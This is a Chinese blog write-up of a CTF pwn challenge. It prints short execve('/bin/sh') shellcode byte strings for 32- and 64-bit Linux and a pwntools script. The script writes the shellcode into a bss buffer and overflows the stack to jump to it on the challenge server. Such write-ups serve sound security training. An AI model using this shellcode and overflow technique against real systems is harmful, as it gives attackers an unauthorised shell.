[GDOUCTF 2023]Shellcode 全网最详细write up

于 2023-11-02 19:35:15 发布
阅读量519 收藏 2
点赞数 1
分类专栏: PWN 文章标签: pwn CTF shellcode bss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41937545/article/details/134189682
版权

[GDOUCTF 2023]Shellcode

32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​

拿到题 先checksec 看一下防护 就不贴图片了

查看main函数

image

有两个read

image

并且没有后门没有system

所以我们可以首先看看有没有能shellcode 的地方 就去查看两次read函数在不在bss段

如果在bss段那我们就可以自己弄一个system

image

这里可以知道第一次的name在bss段

但是这次不能用

asm(shellcraft.sh())

因为使用 shellcraft 默认生成的字节数是 0x30这里只能0x25 我们需要找小于0x25的shellcode

exp如下

from LibcSearcher import *
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#p=process('./ezshell')
p=remote('node4.anna.nssctf.cn',28454)
name_addr=0x6010A0
shellcode="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
p.sendlineafter("Please.",shellcode)
payload=b'a'*0x0A+p64(0)+p64(name_addr)
p.sendlineafter("start!",payload)
p.interactive()

解释一下 因为name在bss段可读写 所以我们需要把shellcode 在第一次的read 先写进去

第二次在溢出 然后跳转到 第一个name的位置 利用shellcode

YesDo_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
m0_61330806的博客
04-07 588
这个页面按下F5,反汇编为伪代码看到关键函数system()点进去看一下,是不是我们要的那种。双击那个system(a)好极了,就是这个。再来看一下变量command是如何传进去的,左上角箭头,回到历史记录再分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。再双击fun看一下,有没有特殊处理经典的字符串倒置代码,也就是说,它会把你的输入倒过来,即ls->sl ,cat flag->galf tac。
[GDOUCTF 2023]Shellcode
m0_74355719的博客
11-29 403
64 位 较短的 shellcode 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05。短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。
GDOUCTF2023 Crypto Pwn
qq_41626232的博客
04-16 524
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间。这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用。参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据。我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的。我直接把fake的base64密文全删了,然后就给了一个压缩包出来了。这不是misc题吗?
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1433
钝角
SHCTF 2023 [WEEK 2] PWN
Xzzzz911的博客
11-01 509
第二周对比第一周难度提高了些,开始要熟悉做pwn的技巧手法了,有些东西不是很好理解,其他佬的WP也没有详细的解释,都默认是常识,弄得我云里雾里,还得多做题目,自己总结,加油加油!!!
Custom Shellcode
最新发布
05-16
Custom Shellcode 代码参考.
基于C++ shellcode及植入目标程序【100011896】
04-12
整体流程主要分为两部分,一是shellcode的生成;二是向目标程序植入shellcode。植入过程主要分为两步:检验当前文件是否为PE文件,是否已被感染 (参照judgePE函数);将shellcode植入目标节,并依据PE文件格式,进行...
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
shellcode加载器用于加密shellcode的py小玩意
10-03
Shellcode是一种低级机器语言代码,通常用于在内存中执行恶意操作,而无需在磁盘上留下可执行文件。在安全领域,shellcode是逆向工程和漏洞利用研究的重要组成部分。"shellcode加载器"是一种工具,其目的是将...
Android系统shellcode编写.zip_android_shellcode
09-23
在Android系统中,shellcode是一种特殊的代码片段,用于在获得程序执行权限后,实现特定功能,比如控制系统、执行恶意操作等。随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode的编写和...
虎符CTF2022 —shellcode
qq_54894802的博客
09-21 257
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
BUUCTF WEB
qq_43633585的博客
09-28 397
warmup 题目描述 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_.
CTF部分密码介绍
X__WY__X的博客
09-18 1816
1.MD5(32与16的区别) MD5 加密后的位数一般为两种,16 位与 32 位。16 位实际上是从 32 位字符串中,取中间的第 9 位到第 24 位的部分,用 Java 语言来说,即:str.substring(8, 24);MD5 加密后的字符串又分为大写与小写两种。所以一个 “123456” 字符串,MD5 加密后的结果类型有这些: 栅栏密码所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本身有一个潜规则,就是组成栅栏的字母一般不会太多
CTF-ECHO-200格式化字符串漏洞+shellcode
BadRer的博客
06-01 2279
很开心有成功做了一道格式化字符串,这题我也不清楚是哪次比赛上的,漏洞还是十分的明显,格式化加个shellcode直接搞定。就是这算的比较麻烦一点。 那么直接进入正题咯! 开干!! 首先拿checksec检查一遍(个人习惯哈) 可以看到,开了栈保护,但是NX disabled,说明堆栈可执行,直接上shellcode,也没有PIE。 先试试水。 应该有格式化漏洞。 IDA反汇
记一次shellcode提取经历
jmp esp
08-15 3346
前言闲来无事,以前都是去exploit-db找shellcode使用,但是有的时候似乎并不那么顺利,找到了之后却由于一些问题(比如之前有一次,要求shellcode里边不能出现0b和0c之类制表符,否则会提前中断,但是一些打开shellshellcode基本都有),想到如果自己掌握了提取方法,或许以后会方便一点,根据自己的要求进行一些更改或者调整指令,为此还专门学习了一下内联汇编的使用(发现并没有
CTF必备技能丨Linux Pwn入门教程——ShellCode
dfdhxb995397的博客
07-10 1186
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。 课程回顾>> Linux Pwn入门教程第一章:环境配置 Linux Pwn入门教程第二章:栈溢出基础 本系列教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式...
shellcode题总结
seaaseesa的博客
05-01 1232
shellcode题总结 有时shellcode受限,最好的方法一般就是勉强的凑出sys read系统调用来输入shellcode主体。下面从几个题来加深理解。 starctf_2019_babyshell 现在shellcode字节允许的范围在表内 我们直接用IDA强制转为汇编,我们发现pop rdx、pop rdi、syscall可以用。 而执行shellcode时,正好...
shellcode downloader
01-08
Shellcode downloader(壳代码下载器)是一种恶意软件的一部分,用于在受感染的系统上下载和执行恶意shellcode。它通常由黑客或攻击者利用系统的弱点,如漏洞或错误配置,将其注入到受感染系统的进程中。 Shellcode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值